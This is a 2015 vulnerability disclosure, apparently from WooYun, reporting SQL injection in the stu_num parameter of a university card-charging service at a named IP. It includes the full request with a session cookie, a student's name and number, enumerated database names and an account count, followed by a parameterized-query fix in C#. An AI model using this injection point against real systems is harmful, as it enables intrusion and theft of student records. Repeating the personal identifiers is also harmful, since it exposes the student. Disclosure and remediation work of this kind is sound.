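2015-04-03: Details reported to the vendor; awaiting vendor handling
2015-04-13: The vendor actively ignored the vulnerability; details disclosed to the public
As per the title.
The stu_num parameter is vulnerable to SQL injection.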
POST /Charge/GetCharge HTTP/1.1
Host: 202.116.65.251
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12D508 MicroMessenger/6.1.4 NetType/WIFI
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://202.116.65.251/Charge/CardCharge/?showwxpaytitle=1&code=03102f1414631e258f35a2e70974a94F&state=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
Cookie: ASP.NET_SessionId=vfjkfqiwztlhg11faosufrg1
Proxy-Connection: keep-alive
Content-Length: 124
Origin: http://202.116.65.251
Accept-Encoding: gzip, deflate

user=%E6%9E%97%E5%BF%97%E6%98%8E&stu_num=033911035&money=100+%E5%85%83&FromSno=&FromName=&tmpId=oF2CkjuMqKbzdJXwBWRxAnjuffyw

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
available databases [13]:
[*] DBSNMP
[*] EQU
[*] FEE
[*] OUTLN
[*] SCHOOL
[*] SCHOOLING
[*] SPORTS
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] YWQ
About 320,000 accounts are exposed; I did not go on to dump the actual data.
select count(*) from ACCOUNT: '329153'
Filter the input.
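One way to apply the fix to stu_num, as an added example that is not from the original report or the vendor's code: allow-list validation plus an Oracle bind variable in C#, matching the ASP.NET and Oracle stack reported above. The ODP.NET managed driver, the nine-digit format, and the column names STU_NUM and BALANCE are assumptions; only the ACCOUNT table name comes from the report.

```csharp
using System;
using System.Text.RegularExpressions;
using Oracle.ManagedDataAccess.Client; // assumption: ODP.NET managed driver

public static class ChargeLookup
{
    // Assumption: student numbers are exactly nine digits, like the sample
    // value in the request above. Adjust the pattern to the real format.
    private static readonly Regex StuNum =
        new Regex(@"\A[0-9]{9}\z", RegexOptions.CultureInvariant);

    // Allow-list check: anything that is not a well-formed student number
    // is rejected before it reaches the database layer.
    public static bool IsValidStuNum(string value)
    {
        return value != null && StuNum.IsMatch(value);
    }

    // Hypothetical lookup. STU_NUM and BALANCE are placeholder column names.
    public static decimal? GetBalance(string connectionString, string stuNum)
    {
        if (!IsValidStuNum(stuNum))
            throw new ArgumentException("stu_num must be nine digits", "stuNum");

        // No string concatenation: the SQL text is constant and the value
        // travels as a bind variable, so Oracle never parses it as SQL.
        const string sql = "SELECT BALANCE FROM ACCOUNT WHERE STU_NUM = :stu_num";

        using (var conn = new OracleConnection(connectionString))
        using (var cmd = new OracleCommand(sql, conn))
        {
            cmd.BindByName = true;
            cmd.Parameters.Add("stu_num", OracleDbType.Varchar2).Value = stuNum;

            conn.Open();
            object result = cmd.ExecuteScalar();
            if (result == null || result == DBNull.Value)
                return null; // no matching account
            return Convert.ToDecimal(result);
        }
    }
}
```

The bind variable is what closes the injection; the allow-list check is defense in depth and gives the caller a clean error for malformed input.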
Severity: no impact (ignored by vendor)
Ignored at: 2015-04-13 16:58
Vulnerability Rank: 4 (WooYun rating)